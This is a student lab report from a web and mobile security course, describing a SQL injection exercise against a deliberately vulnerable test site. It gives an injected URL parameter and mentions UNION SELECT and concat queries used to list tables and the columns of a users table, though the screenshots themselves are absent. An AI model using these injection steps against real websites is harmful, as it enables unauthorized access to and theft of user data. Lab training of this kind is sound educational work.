Professional Documents
Culture Documents
Web & Mobile Security Lab 20CSP-338: Bachelor Degree of Engineering
Web & Mobile Security Lab 20CSP-338: Bachelor Degree of Engineering
20CSP-338
Submitted for the requirement of
Lab Course
ii
Param Sahai
20BCS5964
Experiment 1.4
3. Steps:
iii. Next, insert the malicious query (url) by adding – before 1, i.e
http://testphp.vulnweb.com/listproducts.php?cat=-1
iv. We can also put random number in the url along with the order by clause.
1
Param Sahai
20BCS5964
Fig 1.4.1 (How does a SQL Injection attack works)
2
Param Sahai
20BCS5964
4. Screenshots:
3
Param Sahai
20BCS5964
Fig 1.4.3 (Checking out our query with cat=1)
4
Param Sahai
20BCS5964
Fig 1.4.4 (Checking out our query with cat=-1)
5
Param Sahai
20BCS5964
Fig 1.4.5 (Performing Union Select Query for checking out the Database)
6
Param Sahai
20BCS5964
Fig 1.4.6 (Performing Union Select Query for checking out the Tablename)
7
Param Sahai
20BCS5964
Maybe we can get some important data from the users table, so let’s penetrate more inside. Again,
Use the concat function for table users for retrieving its entire column names.
We successfully retrieve all eight column names from inside the table users.
8
Param Sahai
20BCS5964
Evaluation Grid (To be created as per the SOP and Assessment guidelines by the faculty):
9
Param Sahai
20BCS5964